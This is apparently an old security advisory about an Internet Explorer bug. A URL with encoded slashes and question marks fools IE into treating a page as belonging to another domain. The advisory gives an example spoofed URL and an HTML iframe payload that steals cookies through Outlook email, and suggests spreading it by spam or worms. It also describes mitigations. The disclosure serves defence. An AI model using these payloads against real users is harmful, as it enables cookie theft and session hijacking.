COMMAND

    IE

SYSTEMS AFFECTED

    IE

PROBLEM

    IE can  be fooled  into thinking  a web  page is  in any domain by
    encoding some  characters in  the URL  and placing  the domain you
    want to spoof at the end of the URL.  For example the URL

        http://www.peacefire.org%2fsecurity%2fiecookies%2fshowcookie.html%3F.amazon.com

    is  in  the  pecefire.org  domain  but  because  "/"  and  "?" are
    replaced  by  "%2f"  and  "%3f"  IE  will  think the URL is in the
    amazon.com domain.

    You can find more information at

        http://www.peacefire.org/security/iecookies/

    Although the web page only mentions cookies it may be possible  to
    exploit the  problem in  other ways  as the  security setting  for
    domains may  be different.   For example  the users  may allow the
    execution of unsigned ActiveX controls from its company domain.

    This same IE bug can also be exploited from an HTML Email  message
    in Outlook and Outlook Express.  The trick is to put the magic URL
    in an HTML IFRAME tag.  Example:

        <iframe src="http://www.peacefire.org%2fsecurity%2fiecookies%2fshowcookie.html%3f.yahoo.com/">
        </iframe>

    A  malicious  Email  message  could  include  many IFRAMEs to grab
    cookies from different domains.   The cookies are stolen when  the
    message  is  read.   Using  an  Email  message,  an  attack can be
    directed at a particular person or a group of people without  them
    every going to a Web site.  The exploit could also be included  in
    a spam Email message or in the payload of an Email worm/virus.

SOLUTION

    That  is  why  you  are  supposed  to  configure  outlook to use a
    restricted security zone for  reading mail that doesn't  allow any
    "active scripting languages", etc.  Actually the Restricted  Sites
    Zone  still  has  Active  Scripting  turned  on.   This  zone only
    disables ActiveX controls  and Java applets  by default.   To make
    Outlook and Outlook Express  safe from IE security  holes requires
    Active  Scripting  to  be  turned  off  manually.   Richard putted
    instructions on  his Web  site last  summer that  goes through the
    entire procedure:

        http://www.tiac.net/users/smiths/acctroj/oe.htm

    It  doesn't  make  using   outlook  safe,  but  protects   against
    simplistic things like this.  This whole thing was gone through  a
    few months ago with the "cross site scripting" issue.  The  issues
    are the  same.   There are  lots of  ways to  do this if you don't
    have the zone you use for  reading mail locked down; you can  just
    use javascript in the message itself if you want.

    This hole exposes very little that wasn't already exposed.  Do not
    rate  the  seriousness  of  problems  based on the media attention
    they get.  Why?   Well, for an example,  take a look at  the sites
    listed in "implications" at

        http://peacefire.org/security/iecookies/